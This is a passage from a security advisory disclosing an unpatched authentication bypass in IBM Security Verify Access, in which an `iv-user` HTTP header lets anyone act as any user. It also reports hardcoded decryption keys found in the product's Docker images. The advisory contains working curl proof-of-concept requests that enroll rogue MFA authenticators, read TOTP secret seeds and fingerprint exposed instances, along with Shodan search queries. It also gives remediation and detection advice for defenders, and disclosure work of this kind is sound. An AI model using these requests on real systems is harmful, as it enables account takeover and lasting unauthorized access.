\n\nWhen the IBM Security Verify Access (ISVA) runtime docker instance (a core component of this solution) is reachable over the network, an attacker can bypass the entire authentication and interact with this back-end instance as any user, providing a complete control over any user without authentication. The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities and is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users (for example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...). The back-end APIs provided by the IBM Security Verify Access runtime docker instance are vulnerable to an authentication bypass vulnerability. Since the back-end is fully reachable, this vulnerability allows an attacker to get persistence in a targeted infrastructure by enrolling malicious Multi-Factor Authenticators to any user, without authentication (e.g. an authenticator assigned to any user, protected by a PIN (or not) chosen by the threat actor). In an offensive scenario, an attacker will likely delete authenticators for admins and security team and enroll new authenticators corresponding to admin accounts and get full control over the infrastructure while locking out legit admins. \n\nThis vulnerability has not been patched and IBM recommends implementing network restrictions or using mutual TLS authentication and following best practices:\n\n\u003e Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication. 
\n\u003e \n\u003e From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1\n\u003e\n\u003e And from https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters\n\u003e\n\u003e And from https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications\n\nNote that even with network restrictions, a low-privileged user on a trusted machine can fully compromise the authentication solution, since the back-end used to manage the entire authentication infrastructure can be reached without authentication by sending a specific HTTP header. Network exposure of this back-end (e.g. with IPv6, from monitoring servers, from docker servers, from webseal servers [that must, by design, reach the authentication back-end], or using an SSRF vulnerability) means a full takeover of the authentication infrastructure, which can be quite problematic for large organizations. \n\n_Recommendations_\n\n- - Apply security patches. \n- - Use network segmentation to isolate the Security Verify Access (ISVA) Runtime Docker instance. \n- - Implement the optional authentication based on SSL certificates in the ISVA Runtime Docker instance (this functionality has been added in the latest ISVA release (10.0.8)). \n- - Flag any additional authenticator added to an account as suspicious. \n- - Review logs for any HTTP access from untrusted IPs to the Security Verify Access Runtime Docker instance. \n\n\nShodan provides a list of websites using this technology. For SOC teams, I suggest using Shodan to check if your organization is using IBM Security Verify Access and following IBM\u0027s security recommendations. 
Please note that due to the versatility of this solution, it is very difficult to correctly detect affected installations using a blackbox approach:\n\n- - https://www.shodan.io/search?query=http.favicon.hash%3A-2069014068, 1,740 results as of October 30, 2024\n- - https://www.shodan.io/search?query=webseal, 1,083 results as of October 30, 2024\n- - https://www.shodan.io/search?query=CP%3D%22NON+CUR+OTPi+OUR+NOR+UNI%22, 6,673 results as of October 30, 2024\n\n\n\n## Details - Authentication Bypass on IBM Security Verify Runtime\n\nIt is possible to compromise the authentication mechanism and the authentication infrastructure by reaching the APIs provided by the IBM Security Verify Runtime Docker instance. \n\nThe threat model for this vulnerability requires an attacker with network connectivity to the IBM Security Verify Runtime Docker instance (i) from the Internet (if this service is insecurely exposed) or (ii) more likely from within the LAN of the audited organization (meaning the threat actor can reach the HTTPS server of the IBM Security Verify Runtime Docker instance). \n\nThe IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities. It is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users. For example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn... \n\nThe different authentication mechanisms in the APIs provided by the Runtime Docker instance used to manage users (e.g. adding an authenticator for a specific user, removing an authenticator, getting seeds, ...) can be trivially bypassed by specifying an additional HTTP header `iv-user: target-user` (e.g. `iv-user: admin`) in the HTTPS requests. \n\nAdding the HTTP header `iv-user: target-user` when querying the APIs provides complete control over the `target-user`. 
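The header-based bypass described above can be sketched as a raw HTTP request. A minimal illustration, assuming the hostname `test-runtime` and the user `target-user` from this advisory as placeholders (authorized testing only):

```python
# Minimal sketch of the `iv-user` header bypass described above. The host
# "test-runtime", the path, and the user "target-user" are placeholders
# taken from this advisory.

def build_bypass_request(host: str, path: str, target_user: str) -> str:
    """Build a raw HTTP request impersonating `target_user` via `iv-user`."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"iv-user: {target_user}\r\n"  # the single header that bypasses authentication
        f"Accept: application/json\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    )

req = build_bypass_request("test-runtime", "/sps/mmfa/user/mgmt/authenticators", "target-user")
print(req.splitlines()[2])  # → iv-user: target-user
```

The only difference from a legitimate unauthenticated request is this single header; no cookie, token, or client certificate is involved.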
\n\nThere is an HTTPS server reachable on port 443/tcp providing APIs:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nUsually, the IBM Security Verify Runtime Docker instance is only reached by WebSEAL servers (reverse-proxies managing authentication), after a successful authentication as `easuser`, as shown below:\n\nDocumentation from https://www.ibm.com/docs/SSPREK_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:\n\n\u003e Select the method for authentication between WebSEAL and the Advanced Access Control runtime listening interface\n\u003e \n\u003e Certificate authentication\n\u003e\n\u003e Use a certificate to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. \n\u003e\n\u003e User ID and password authentication\n\u003e\n\u003e Use credentials to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. \n\u003e The default username is easuser and the default password is passw0rd. \n\n\nAttack scenario: an attacker will reach the HTTPS APIs provided by the IBM Security Verify Runtime Docker instance and will not use an SSL certificate or any credential used to manage the instance (`easuser`). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nNote that while the WebSEAL servers are exposed to the Internet, the runtime instance is located inside the LAN and is not usually exposed to the Internet. The attacker needs to be located inside the LAN to reach the vulnerable APIs. \n\nAccording to the documentation at https://www.ibm.com/docs/en/sva/10.0.7, we can see that the APIs are always reachable using the `/mga/sps/*` path. 
Actually, the `/mga/` route seems to be managed by WebSEAL servers while the `/sps/*` routes are managed by the runtime docker instance. \n\nWithout authentication, an attacker can reach the IBM Security Verify Runtime Docker instance by reaching, for example, the `/sps/oauth/oauth20/authorize?client_id=ClientID\u0026response_type=code\u0026scope=mmfaAuthn` API endpoint and specifying which target user to compromise using the additional HTTP header `iv-user: target-user`. This specific endpoint is used to enroll a new Multi-Factor Authenticator (e.g. the official IBM Security Verify app (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en)) for the `target-user` user. \n\nBy specifying the HTTP header `iv-user: target-user`, an attacker can interact with all the APIs located in `/sps/*` for any user, without authentication. \n\nListing of authenticators without any cookie or HTTP header - this non-intrusive request allows detecting a vulnerable IBM Security Verify Runtime Docker instance configured to use MFA. \n\n kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators | jq . \n {\n \"result\": \"FBTRBA306E The user management operation failed because the user is not authenticated.\"\n }\n\nListing of authenticators for the `target-user` - with the `iv-user` HTTP header (without session cookies or specific credentials):\n\n kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H \"iv-user: target-user\" | jq . 
\n [\n {\n \"device_name\": \"Iphone 13 Pro Max\",\n \"oauth_grant\": \"uuida71[REDACTED]\",\n \"auth_methods\": [],\n \"os_version\": \"13\",\n \"device_type\": \"[REDACTED]\",\n \"id\": \"uuid20[REDACTED]\",\n \"enabled\": true\n },\n {\n \"device_name\": \"Iphone 13 Pro Max\",\n \"oauth_grant\": \"uuida71[REDACTED]\",\n \"auth_methods\": [],\n \"os_version\": \"13\",\n \"device_type\": \"[REDACTED]\",\n \"id\": \"uuid20[REDACTED]\",\n \"enabled\": true\n },\n [...]\n kali% \n\nIt is possible to enroll any new authenticator for the user target without authentication by reaching the IBM Security Verify Runtime instance and specifying `iv-user: target-user` in the HTTP header:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nA PoC is provided below. The provided secret code allows enrolling a new authenticator for the target user `target-user`. Note that the `client_id` variable must be edited as we use the specific TestAuthenticatorClient client identifier. \nThe valid `client_id` variable can be retrieved from the `/sps/mga/user/mgmt/grant` API:\n\n kali% curl -kv -H \"iv-user: target-user\" https://test-runtime/sps/mga/user/mgmt/grant | jq . \n {\n \"grants\": [\n {\n \"id\": \"uuida71[REDACTED]\",\n \"isEnabled\": true,\n \"clientId\": \"TestAuthenticatorClient\",\n [...]\n\nI suggest using the specific `client_id` identifier configured in the targeted instance. The correct `client_id` identifier can also be obtained by visiting `https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html`. The `device_selection.html` webpage is just a front-end to get access to several APIs:\n\n- - /sps/mga/user/mgmt/grant\n- - /sps/mmfa/user/mgmt/authenticators\n- - /sps/fido2/registrations\n- - /sps/mga/user/mgmt/device \n- - /sps/apiauthsvc/policy/u2f_register\n- - /sps/mga/user/mgmt/clients\n- - ... 
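The two response shapes shown above (an `FBTRBA306E` error object without the header, and a JSON list of authenticators when `iv-user` is honoured) can be told apart programmatically. A small sketch, assuming the bodies follow the shapes captured in this advisory:

```python
import json

# Distinguish the two response shapes captured above for
# /sps/mmfa/user/mgmt/authenticators: an FBTRBA306E error object when the
# request is unauthenticated, a JSON list of authenticators when the
# `iv-user` header is honoured.

def classify_response(body: str) -> str:
    data = json.loads(body)
    if isinstance(data, dict) and "FBTRBA306E" in data.get("result", ""):
        return "unauthenticated"   # header missing or instance not vulnerable
    if isinstance(data, list):
        return "bypass-succeeded"  # authenticator list returned for the target user
    return "unknown"

print(classify_response('{"result": "FBTRBA306E The user management operation '
                        'failed because the user is not authenticated."}'))  # → unauthenticated
print(classify_response('[{"device_name": "Iphone 13 Pro Max", "enabled": true}]'))  # → bypass-succeeded
```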
\n\nFor example, visiting a remote IBM Security Verify Runtime instance at `https://url/sps/mga/user/mgmt/html/device/device_selection.html` without an `iv-user: target-user` HTTP header will return empty information (since the resulting requests sent to APIs are not \"authenticated\"):\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nVisiting the same address `https://url/sps/mga/user/mgmt/html/device/device_selection.html` using Burp Suite Pro, and (i) adding an HTTP header `iv-user: target-user` in all the resulting HTTP requests and (ii) rewriting the URL from `^\\/mga\\/sps\\/` to `\\/sps\\/` (since the `/mga/` path is hardcoded in JavaScript code) will now provide full access for the `target-user` (adding an authenticator, deleting an authenticator, adding passkeys, ...). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nAn attacker can also add a new authenticator for any user using curl:\n\nPoC:\n\n kali% curl -kv \"https://test-runtime/sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient\u0026response_type=code\u0026scope=mmfaAuthn\" -H \"iv-user: target-user\" \n * Host test-runtime:443 was resolved. \n * IPv6: (none)\n * IPv4: 10.0.0.15\n * Trying 10.0.0.15:443... 
\n * Connected to test-runtime (10.0.0.15) port 443\n * using HTTP/1.x\n \u003e GET /sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient\u0026response_type=code\u0026scope=mmfaAuthn HTTP/1.1\n \u003e Host: test-runtime\n \u003e User-Agent: curl/8.5.0\n \u003e Accept: */*\n \u003e iv-user: target-user\n \u003e \n \u003c HTTP/1.1 302 Found\n \u003c X-Frame-Options: SAMEORIGIN\n \u003c Pragma: no-cache\n \u003c Location: https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient\u0026code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\n \u003c Content-Language: en-US\n \u003c Transfer-Encoding: chunked\n \u003c Date: Sat, 07 Sep 2024 12:07:21 GMT\n \u003c Expires: Thu, 01 Dec 1994 16:00:00 GMT\n \u003c Cache-Control: no-store, no-cache=set-cookie\n \u003c \n * Connection #0 to host test-runtime left intact\n \nThe resulting secret `code` provided in the HTTP answer can be used to enroll an official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) corresponding to the `target-user`. 
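The secret `code` can be extracted from the `Location` header of the 302 answer with standard URL parsing. A sketch using the exact redirect URL shown in the PoC above:

```python
from urllib.parse import urlparse, parse_qs

# Extract the secret enrollment `code` from the Location header of the 302
# answer shown above (the URL below is the one returned in the PoC).

location = ("https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html"
            "?client_id=TestAuthenticatorClient&code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y")

params = parse_qs(urlparse(location).query)
code = params["code"][0]            # secret code used to enroll an authenticator
client_id = params["client_id"][0]  # client identifier configured on the instance
print(code, client_id)  # → 0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y TestAuthenticatorClient
```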
\n\nIn order to import this secret token inside an IBM Verify Security application (an authenticator), we can:\n\n- - reach the `https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient\u0026code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y` webpage (without `/mga` at the beginning of the URL) and scan the generated QR code; Burp Suite Pro is required to replace all the API calls from `/mga/sps/` to `/sps/`; or\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n- - reach the `/sps/mmfa/user/mgmt/qr_code/json` API to get the json encoded data inside the QR code (using `?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient`) and generate the QR code (note that in the next HTTP answer, the `ignoreSslCerts=true` is not the default option); or\n\n\u003cpre\u003e\nGET /sps/mmfa/user/mgmt/qr_code/json?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient HTTP/1.1\nHost: test-runtime\niv-user: target-user\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n\nHTTP/1.1 200 OK\nContent-Type: application/json\nX-Frame-Options: SAMEORIGIN\nPragma: no-cache\nContent-Language: en-US\nConnection: Close\nDate: Sat, 07 Sep 2024 20:39:55 GMT\nExpires: Thu, 01 Dec 1994 16:00:00 GMT\nCache-Control: no-store, no-cache=set-cookie\nContent-Length: 202\n\n{\"code\":\"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\",\"options\":\"ignoreSslCerts=true\",\n\"details_url\":\"https:\\/\\/enroll-url\\/mga\\/sps\\/mmfa\\/user\\/mgmt\\/details\",\n\"version\":1,\"client_id\":\"TestAuthenticatorClient\"}\n\u003c/pre\u003e\n\n- - reach the `/mga/sps/mmfa/user/mgmt/qr_code/json` API (provided by any targeted WebSEAL servers from the same 
infrastructure, including Internet-facing WebSEAL servers) to get the json encoded data inside the QR code (using `?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient`) and generate the QR code; or\n\n- - simply locally generate the QR code containing the JSON data as shown below using the `qrencode` program:\n\n\u003cpre\u003e\n kali% qrencode -o picture.png \u0027{\"code\":\"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\",\"options\":\"ignoreSslCerts=false\",\"details_url\":\"https:\\/\\/enroll-url\\/mga\\/sps\\/mmfa\\/user\\/mgmt\\/details\",\"version\":1,\"client_id\":\"TestAuthenticatorClient\"}\u0027\n\u003c/pre\u003e\n\nThen the QR code needs to be scanned using the official IBM Verify Security App (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) in order to enroll a new device. By default, the specific `https://enroll-url/mga/sps/mmfa/user/mgmt/details` is always reachable from the Internet in order to successfully enroll smartphones. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) has been used and successfully enrolled for the `target-user` and can now be used to authenticate as `target-user`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe device has been correctly enrolled from the Internet as shown below, by using the `/sps/mmfa/user/mgmt/authenticators` API without authentication. \n\n kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H \"iv-user: target-user\" | jq . 
\n [\n {\n \"device_name\": \"Samsung S22\",\n \"oauth_grant\": \"uuida72253ef[REDACTED]\",\n \"auth_methods\": [\n {\n \"key_handle\": \"32e[REDACTED].userPresence\",\n \"id\": \"uuidb694[REDACTED]\",\n \"type\": \"user_presence\",\n \"enabled\": true,\n \"algorithm\": \"SHA256withRSA\"\n }\n ],\n \"os_version\": \"13\",\n \"device_type\": \"[REMOVED]\",\n \"id\": \"uuidb4fde[REDACTED]\",\n \"enabled\": true\n },\n [...]\n\n\nFurthermore, all the APIs in `/sps/*` are directly reachable by specifying the HTTP header `iv-user: target-user`. \n\nWe can also list the secret key for the seed corresponding to OTP:\n\n kali% curl -ks https://test-runtime/sps/mga/user/mgmt/otp/totp -H \"iv-user: target-user\" | jq . \n { \n \"period\": \"30\",\n \"secretKeyUrl\": \"otpauth://totp/Example:target-user\"?secret=NSJ[REDACTED][REDACTED][REDACTED]\u0026issuer=Example\",\n \"secretKey\": \"NSJ[REDACTED][REDACTED][REDACTED]\",\n \"digits\": \"6\",\n \"username\": \"target-user\",\n \"algorithm\": \"HmacSHA1\"\n }\n\n\nAll the APIs located in `/sps/` are vulnerable to this authentication bypass. \n\nAs shown previously, it is possible to bypass the entire authentication and interact with the IBM Security Verify runtime docker instance as any user. \n\nAn attacker can enroll a device for any user, bypassing the entire access controls, and get control over the infrastructure. Since the back-end is fully reachable, an attacker can also delete any authenticator for any user. \n\nAt the time of the security assessment (October 2022), I was not able to find any official documentation that recommends not exposing the runtime instance to the network, since the runtime APIs are password protected. \n\nThe latest ISVA release (10.0.8) implements an optional authentication based on SSL certificates. It is **strongly recommended** to implement this authentication mechanism and not to expose the ISVA runtime instance to the network. 
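To illustrate why the leaked `secretKey` is so damaging: anyone holding the base32 seed can compute valid one-time codes. A minimal RFC 6238 TOTP sketch matching the parameters in the JSON answer above (`HmacSHA1`, 6 digits, 30-second period); the seed used here is the RFC 6238 test secret, not a value from a real instance:

```python
import base64
import hashlib
import hmac
import struct

# RFC 6238 TOTP: HMAC-SHA1 over the 30-second time counter, dynamic
# truncation, then the last `digits` decimal digits. These are the
# parameters shown in the leaked JSON answer above.

def totp(secret_b32: str, timestamp: int, period: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32)
    counter = struct.pack(">Q", timestamp // period)
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation (RFC 4226)
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)

# RFC 6238 test vector: secret "12345678901234567890", T=59 → 94287082 (8 digits)
rfc_secret = base64.b32encode(b"12345678901234567890").decode()
print(totp(rfc_secret, 59))  # → 287082 (last 6 digits of the RFC test vector)
```

With the `secretKey` leaked by `/sps/mga/user/mgmt/otp/totp`, this computation yields valid codes for `target-user` indefinitely, even after the bypass itself is mitigated.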
\n\n**Without this optional authentication, any malicious actor (i) with access to WebSEAL servers (with a shell or an SSRF vulnerability) or (ii) with direct network access to the runtime instance, or (iii) with shell access to any \u0027trusted\u0027 machine (e.g. a monitoring server querying the HTTPS server of ISVA runtime), or (iv) with a low-privilege shell on the docker server running the solution, can completely compromise the authentication infrastructure, without credentials**. \n\nRegarding the official recommendations, IBM recommends (i) not to expose the runtime instance to untrusted clients or (ii) to implement SSL-based certificate authentication and follow these best practices. IBM provided these references as official responses regarding this issue:\n\n- - From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;\n- - And https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;\n- - And https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:\n\n\u003e Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication. \n\nFrom my understanding, this vulnerability is not going to be patched (no security bulletin was published, no CVE has been assigned, and the ticket has been closed as solved) because, according to the official recommendations, it is the customer\u0027s responsibility to filter any communication to the runtime instance. This security advisory will allow offensive and defensive security teams to correctly understand and improve their security posture. 
\n\nAbout the detection of insecure instances, an HTTPS request to the `/sps/` route providing the banner `Server: IBM Security Verify Access` in the HTTPS answer will allow SOC teams to detect an instance. The banner will not appear when reaching `https://test-runtime/`. If MFA is used, an HTTP request to `/sps/mga/user/mgmt/html/device/device_selection.html` (port `443` or `9443`, by default) will allow SOC teams to detect an insecure ISVA runtime instance. An answer indicating `200 OK` with the content of the `device_selection.html` webpage will indicate that the tested instance is probably insecure:\n\n kali% curl -k https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html\n [...]\n \u003c HTTP/1.1 200 OK\n \u003c X-Frame-Options: SAMEORIGIN\n \u003c Server: IBM Security Verify Access\n \u003c Content-Type: text/html;charset=UTF-8\n [...]\n \u003c!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n \u003chtml\u003e\n \n \u003chead\u003e\n \u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"\u003e\n \u003ctitle\u003eDevice Selection\u003c/title\u003e\n \u003clink type=\"text/css\" rel=\"stylesheet\" href=\"/sps/static/design.css\"\u003e\u003c/link\u003e\n \u003clink type=\"text/css\" rel=\"stylesheet\" href=\"/sps/mga/user/mgmt/html/device/device_selection.css\"\u003e\u003c/link\u003e\n \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/mgmt_msg.js\"\u003e\u003c/script\u003e\n \u003cscript type=\"text/javascript\" src=\"/sps/static/u2fI18n.js\"\u003e\u003c/script\u003e\n \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/common.js\"\u003e\u003c/script\u003e\n \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/device/device_selection.js\"\u003e\u003c/script\u003e\n\nOn a side note, from my tests, the APIs are also exposed with authentication from the Internet by visiting 
`https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html`. If `device_selection.html` is blocked, it is simply possible to inject the correct answer with Burp Suite Pro (using the `device_selection.html` webpage available in official IBM Docker images) and the previous `/mga/sps/` APIs are still reachable since they are needed to successfully enroll an authenticator from the Internet (e.g. the official IBM Verify Security App running on a smartphone). An attacker who enrolled a rogue authenticator to a compromised account can get persistent access from the Internet even if the runtime instance is not reachable anymore or if the \"regular\" ISVA servers are only reachable from inside the company: the APIs provided by the Internet-facing enrollment server will allow the attackers to enroll new authenticators and retrieve current seeds. \n\nFurthermore, with Internet-facing servers (by design, to enroll authenticators) and an authenticated session, the attack surface is quite large. \n\nIt is also possible to list the target version of an Internet-facing instance (proxied through WebSEAL) by visiting the `/mga/sps/mmfa/user/mgmt/details` API (when MFA is enabled in ISVA):\n\n curl -s https://internet-faced-website/mga/sps/mmfa/user/mgmt/details | jq . 
\n {\n \"authntrxn_endpoint\": \"https://info.domain.tld/scim/Me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:transactionsPending,urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:attributesPending\",\n \"metadata\": {\n \"service_name\": \"Organisation\",\n \"qrlogin_endpoint\": \"https://info.domain.tld/mga/sps/authsvc?PolicyId=urn:ibm:security:authentication:asf:qrcode_response\"\n [...]\n \"enrollment_endpoint\": \"https://info.domain.tld/scim/Me\",\n [...]\n \"version\": \"10.0.8.0\",\n [...]\n }\n\n\n\n## Details - Reuse of snapshot private keys\n\nThe official Docker images have been retrieved and analyzed on a local machine:\n\n kali-docker# docker images\n REPOSITORY TAG IMAGE ID CREATED SIZE\n ibmcom/verify-access-runtime 10.0.4.0 498e181d7395 3 months ago 1.07GB\n ibmcom/verify-access-wrp 10.0.4.0 c0003aca743c 3 months ago 442MB\n ibmcom/verify-access 10.0.4.0 206efdd7809c 3 months ago 1.53GB\n ibmcom/verify-access-dsc 10.0.4.0 959f6f1095e9 3 months ago 305MB\n kali-docker# docker save 498e181d7395 \u003e ibmcom/verify-access-runtime.tar\n kali-docker# docker save c0003aca743c \u003e ibmcom/verify-access-wrp.tar\n kali-docker# docker save 206efdd7809c \u003e ibmcom/verify-access.tar\n kali-docker# docker save 959f6f1095e9 \u003e ibmcom/verify-access-dsc.tar\n\nIt was observed that instances contain custom encryption/decryption keys (`device_key.kdb` and `device_key.sth` files) located inside `/var/.ca/`. \n\nThese keys are used by the `isva_decrypt` utility present in all the images. For example, the `/usr/sbin/bootstrap.sh` script will decrypt the stored openldap.zip file using `isva_decrypt`:\n\nContent of `/usr/sbin/bootstrap.sh`:\n\n [...]\n # Decrypt and extract the LDAP configuration. 
\n isva_decrypt $snapshot_tmp_dir/openldap.zip\n\n unzip -q -o $snapshot_tmp_dir/openldap.zip -d /\n [...]\n\nWhen doing an analysis on the official IBM images obtained on Docker Hub, we can confirm the keys (`device_key.kdb` and `device_key.sth`) are in fact hardcoded inside these official IBM images and some of them are also world-readable by default:\n\n kali-docker# ls -la */*/var/.ca/* \n -rw-r--r-- 1 root root 5991 Jun 8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n -rw-r--r-- 1 root root 193 Jun 8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth\n -rw-r--r-- 1 root root 5991 Jun 8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb\n -rw-r--r-- 1 root root 193 Jun 8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth\n -rw------- 1 root root 5991 Jun 8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb\n -rw------- 1 root root 193 Jun 8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth\n -rw-r--r-- 1 root root 5991 Jun 8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb\n -rw-r--r-- 1 root root 193 Jun 8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth\n \n kali-docker# sha256sum */*/var/.ca/*|sort|uniq\n dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth\n dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce 
_verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth\n dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth\n dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth\n f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb\n f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb\n f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb\n\nUsing these keys and the `IBM Crypto for C` programs, we can successfully decrypt the `openldap.zip` file - an encrypted zip file - available inside the `default.snapshot` file - this file contains the entire configuration of 